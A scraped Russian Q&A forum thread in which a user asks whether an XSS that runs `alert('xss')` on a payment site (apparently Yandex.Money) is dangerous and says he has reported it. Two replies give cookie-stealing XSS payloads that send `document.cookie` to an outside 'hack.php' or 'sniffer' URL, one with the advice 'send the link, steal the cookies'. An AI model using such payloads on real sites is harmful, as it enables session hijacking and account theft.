Как проверить XSS уязвимость?

Question

Nimor @Nimor

Информационная безопасность

Как проверить XSS уязвимость?

Выполняется: javascript: alert('xss')

Опасно? Стоит писать саппорту или пошлют меня?

Вопрос задан более трёх лет назад
6461 просмотр

Комментировать

Подписаться 7 Оценить Комментировать

Пригласить эксперта

Ответы на вопрос 5

Комментировать

1 комментарий

Комментировать

1 комментарий

Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации

Похожие вопросы

Информационная безопасность

Простой
Могут ли злоумышленники физический заразить материнскую плату?
- 1 подписчик
- 26 апр.
- 143 просмотра
4

ответа
Информационная безопасность

+1 ещё

Простой
Как запустить vbs с правами администратора, но без ввода пароля?
- 2 подписчика
- 24 апр.
- 210 просмотров
1

ответ
Информационная безопасность

+1 ещё

Средний
Как рассчитать количество информации в двоично-симметричном канале?
- 1 подписчик
- 23 апр.
- 45 просмотров
0

ответов
Информационная безопасность

Простой
Какие сканеры уязвимости посоветуете?
- 1 подписчик
- 22 апр.
- 109 просмотров
1

ответ
Информационная безопасность

+1 ещё

Средний
Может ли при подключении внешний жёсткий диск показать иной серийный номер?
- 1 подписчик
- 22 апр.
- 106 просмотров
0

ответов
Информационная безопасность

+1 ещё

Простой
В каких случаях возможно использование несертифицированного Web Application Firewall?
- 3 подписчика
- 22 апр.
- 178 просмотров
2

ответа
Компьютерные сети

+2 ещё

Средний
Как настроить ACL между vlan, чтобы был полный доступ с одного vlan, с другого нет?
- 1 подписчик
- 18 апр.
- 160 просмотров
2

ответа
Информационная безопасность

+4 ещё

Простой
Как исправить ошибку 0x138c при настройке консолидации логов с одного контроллера домена на другой?
- 1 подписчик
- 07 апр.
- 87 просмотров
0

ответов
Windows

+4 ещё

Средний
Как исключить Извещение безопасности Microsoft Outlook для ссылок в письмах?
- 2 подписчика
- 07 апр.
- 227 просмотров
1

ответ
Информационная безопасность

Простой
Информационная безопасность в облачных сервисах?
- 2 подписчика
- 03 апр.
- 220 просмотров
5

ответов
Показать ещё Загружается…

Специалист по управлению уязвимостями (информационная безопасность)

Гринатом • Москва

от 100 000 до 120 000 ₽

DevSecOps

Outlines Tech

от 300 000 до 350 000 ₽

Руководитель направления информационной безопасности ОКИИ

Интер РАО – Управление сервисами • Санкт-Петербург

от 180 000 ₽

Внести правки в проект на nest и react

05 мая 2024, в 06:38

50000 руб./за проект

Специалист по телеграм

05 мая 2024, в 04:55

12000 руб./за проект

Название проекта: Бот Telegram для автоматизации судебных приказов

05 мая 2024, в 02:15

30000 руб./за проект

Answer 1 · 2012-01-19 13:34:27

Nimor @Nimor Автор вопроса

Отписал в поддержку Яндекса, в общем все равно что-то да выполняется, это же плохо.

Ответ написан более трёх лет назад

Комментировать

Answer 2 · 2012-01-19 13:00:27

Выполняется в GET запросе? Подставляем вместо алерта

<script>
document.location="http://yoursite.com/hack.php?cookie=" + document.cookie;document.location="http://www.site.com"
</script>

Где hack.php — наш простенький скрипт по сохранению кукисов. Шлем ссылку, угоняем куки.

Answer 3 · 2012-01-19 13:14:58

Nimor @Nimor Автор вопроса

"<" and ">" запрещены. Это опять на yandex-money. Зато "<" and ">" работают в поле javascript: alert('< >')

Ответ написан более трёх лет назад

Комментировать

Answer 4 · 2012-01-19 13:16:15

Если у Вас выполняется alert('xss'), то и какой-нибудь

var t=new Image();t.src='http://google.com/sniffer/?'+document.cookie;

Должен выполниться.

Answer 5 · 2012-01-19 13:17:26

Nimor @Nimor Автор вопроса

Понятно, я не знаю что такое sniffer, это опасно или нет?

Ответ написан более трёх лет назад

1 комментарий

Как проверить XSS уязвимость?

Войдите, чтобы написать ответ

Минуточку внимания

Войдите на сайт